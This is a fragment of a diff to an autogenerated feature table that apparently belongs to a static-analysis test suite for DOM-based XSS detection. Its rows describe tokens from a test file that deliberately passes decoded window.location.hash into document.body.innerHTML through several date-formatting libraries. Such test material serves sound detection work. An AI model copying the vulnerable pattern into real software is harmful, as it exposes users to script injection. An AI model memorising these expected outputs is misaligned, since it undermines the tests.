autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:26:27:26:43 | "@date-io/moment" | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:26:27:26:43 | "@date-io/moment" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:26:27:26:43 | "@date-io/moment" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:27:1:27:41 | import ... /dayjs" | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:27:1:27:41 | import ... /dayjs" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:27:1:27:41 | import ... /dayjs" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:27:8:27:19 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:27:26:27:41 | "@date-io/dayjs" | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:27:26:27:41 | "@date-io/dayjs" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:27:26:27:41 | "@date-io/dayjs" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DateFnsAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DateFnsAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DateFnsAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DateFnsAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DateFnsAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DayJSAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DayJSAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | LuxonAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | LuxonAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | MomentAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | MomentAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | MomentAdapter | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | this | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | this | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | this | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:29:0 | this | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | 'arguments' object of function dateio | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | 'arguments' object of function dateio | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | 'arguments' object of function dateio | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | 'arguments' object of function dateio | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | 'arguments' object of function dateio | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | exceptional return of function dateio | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | exceptional return of function dateio | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | exceptional return of function dateio | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | exceptional return of function dateio | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | exceptional return of function dateio | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | functio ... OT OK\\n} | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | functio ... OT OK\\n} | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | return of function dateio | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | return of function dateio | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | return of function dateio | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | return of function dateio | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:29:1:41:1 | return of function dateio | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:29:10:29:15 | dateio | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:29:10:29:15 | dateio | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:29:10:29:15 | dateio | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:13 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:13 | taint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:13 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:13 | taint | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:13 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint = ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint = ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint = ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint = ... ing(1)) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:9:30:69 | taint = ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:34 | decodeURIComponent | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:34 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:34 | decodeURIComponent | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:34 | decodeURIComponent | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:34 | decodeURIComponent | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | decodeU ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | decodeU ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | decodeU ... ing(1)) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | exceptional return of decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | exceptional return of decodeU ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:17:30:69 | exceptional return of decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:41 | window | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:41 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:41 | window | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:41 | window | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:41 | window | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:50 | window.location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:50 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:50 | window.location | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:50 | window.location | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:50 | window.location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:55 | window.location.hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:55 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:55 | window.location.hash | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:55 | window.location.hash | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:55 | window.location.hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:65 | window. ... bstring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:65 | window. ... bstring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:65 | window. ... bstring | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:65 | window. ... bstring | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:65 | window. ... bstring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | exceptional return of window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | exceptional return of window. ... ring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | exceptional return of window. ... ring(1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | exceptional return of window. ... ring(1) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | exceptional return of window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | window. ... ring(1) | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | window. ... ring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -13049,6 +97498,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | window. ... ring(1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | | autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | window. ... ring(1) | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:30:36:30:68 | window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:43:30:50 | location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:43:30:50 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:43:30:50 | location | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:43:30:50 | location | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:43:30:50 | location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:52:30:55 | hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:52:30:55 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:52:30:55 | hash | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:52:30:55 | hash | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:52:30:55 | hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:30:57:30:65 | substring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:30:57:30:65 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:30:57:30:65 | substring | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:30:57:30:65 | substring | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:30:57:30:65 | substring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:30:67:30:67 | 1 | CalleeFlexibleAccessPath | window.location.hash.substring | | autogenerated/Xss/DomBasedXss/dates.js:30:67:30:67 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:30:67:30:67 | 1 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -13056,12 +97520,199 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:30:67:30:67 | 1 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | | autogenerated/Xss/DomBasedXss/dates.js:30:67:30:67 | 1 | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:30:67:30:67 | 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:32:11:32:17 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| 